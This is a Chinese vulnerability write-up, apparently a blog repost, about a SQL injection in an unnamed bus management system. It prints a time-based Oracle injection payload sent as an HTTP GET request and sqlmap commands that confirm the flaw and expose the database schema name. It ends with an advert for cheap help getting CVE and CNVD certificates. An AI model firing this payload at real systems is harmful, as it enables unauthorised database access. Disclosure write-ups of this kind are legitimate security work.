文章总结: 文章介绍了一个公交管理系统的高危SQL注入漏洞,提供了漏洞复现的POC和验证过程,使用sqlmap工具确认了漏洞存在,数据库为Oracle。作者尝试提交报告但发现重复。这是一篇漏洞分析报告,展示了具体的漏洞利用方法。
综合评分: 76
文章分类: 漏洞分析,WEB安全,漏洞POC,漏洞预警,实战经验
高危CNVD|某公交管理系统存在SQL注入漏洞
原创
匆匆过客
天启攻防实验室
2025年8月29日 12:27
广东
标题已修改
登录前台
三、漏洞复现
(2)构造poc,如下,成功验证存在漏洞
POC:
GET/xxxx.aspx?d=1&fuelpriceid=1’+AND+3536=DBMS_PIPE.RECEIVE_MESSAGE(CHR(70)||CHR(101)||CHR(88)||CHR(83),2)–+FjHn HTTP/1.1
Host: x.x.x.x:8003
Connection: close
(3)截图
Python sqlmap -dbms=Oracle -level 5
302 选 N
No cookie
Sqlmap确认有漏洞
current database (equivalent to schema on Oracle): ‘APTSHD’ –hex
ok,整理报告提交,但是很可惜重复了。
低价接指导CVE、CNNVD等平台下证服务,低价报考CISP NISP CISP-PTE CISP-PTS等证书。需要的后台滴滴
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:天启攻防实验室 匆匆过客《高危CNVD|某公交管理系统存在SQL注入漏洞》